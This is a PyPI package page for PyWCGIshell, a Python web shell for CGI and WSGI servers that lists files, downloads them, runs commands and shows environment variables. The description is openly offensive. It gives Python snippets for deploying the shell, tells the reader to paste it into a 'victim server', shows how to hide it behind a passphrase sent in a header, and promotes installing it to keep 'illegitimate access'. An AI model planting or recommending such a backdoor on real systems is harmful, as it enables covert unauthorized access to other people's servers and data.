This package implement a WebShell for CGI and WSGI server.

Navigation

Verified details

These details have been verified by PyPI
Maintainers
Avatar for MauriceLambert from gravatar.com MauriceLambert

Unverified details

These details have not been verified by PyPI
Project links
GitHub Statistics

View statistics for this project via Libraries.io, or by using our public dataset on Google BigQuery

Meta

License: GPL-3.0 License

Author: Maurice Lambert

Maintainer: Maurice Lambert

Tags WebShell, Server, Web, Hacking, WSGI, CGI, Security

Requires: Python >=3.6

Classifiers

Project description

PyWCGIshell logo

PyWCGIshell

Description

This package implement a WebShell for CGI and WSGI server.

With this WebShell you can:

  • explore directories and download files
  • execute command lines (with command history)
  • show basic informations about environment server
  • show environments variables

Requirements

This package require :

  • python3
  • python3 Standard Library

Installation

pip install PyWCGIshell

Usages

Command line

(Command line is useful to try the webshell)

python3 -m PyWCGIshell wsgi # Try it in wsgi mode

Python script

CGI page

from PyWCGIshell import WebShell

def my_default_cgi_page():
	print("Content-type:text/plain; charset=utf-8")
	print("")
	print("Hello World !")

webshell = WebShell()
webshell.standard_page = my_default_cgi_page
webshell.run()

WSGI page

from PyWCGIshell import WebShell

def my_default_wsgi_page(environ, start_response):
    status = '200 OK'
    headers = [('Content-type', 'text/plain; charset=utf-8')]
    start_response(status, headers)
    return [b"Hello World !"]

webshell = WebShell(type_="wsgi")
webshell.standard_page = my_default_wsgi_page
application = webshell.run
# Apache with mod_wsgi use the "application" as default function

WebShell options

from PyWCGIshell import WebShell

webshell = WebShell(type_="cgi", passphrase="SHELL", pass_type="method")
webshell.run()

I don't recommend using method like pass_type to hide your WebShell.

You can use similar configuration to hide your WebShell.

from PyWCGIshell import WebShell

webshell = WebShell(type_="wsgi", passphrase="<inexistant api key>", pass_type="header_value")
application = webshell.run

To use this WebShell:

  • Configure (server type, passphrase and passphrase location) and copy the WebShell code or install it
  • Paste it in the default page of the victim server or import it
  • Send a request with the passphrase and exploit the weak server

Example

Install and configure PyWCGIshell on WebScripts to keep your illegitimate access and hide it (repo is here).

WebShell on WebScripts - Youtube

WebShell on WebScripts - Youtube

Links

Licence

Licensed under the GPL, version 3.

Project details

Verified details

These details have been verified by PyPI
Maintainers
Avatar for MauriceLambert from gravatar.com MauriceLambert

Unverified details

These details have not been verified by PyPI
Project links
GitHub Statistics

View statistics for this project via Libraries.io, or by using our public dataset on Google BigQuery

Meta

License: GPL-3.0 License

Author: Maurice Lambert

Maintainer: Maurice Lambert

Tags WebShell, Server, Web, Hacking, WSGI, CGI, Security

Requires: Python >=3.6

Classifiers

Release history Release notifications | RSS feed

This version

1.1.0

1.0.3

1.0.2

1.0.1

1.0.0

0.0.2

0.0.1

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

PyWCGIshell-1.1.0.tar.gz (21.1 kB view hashes)

Uploaded Source

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page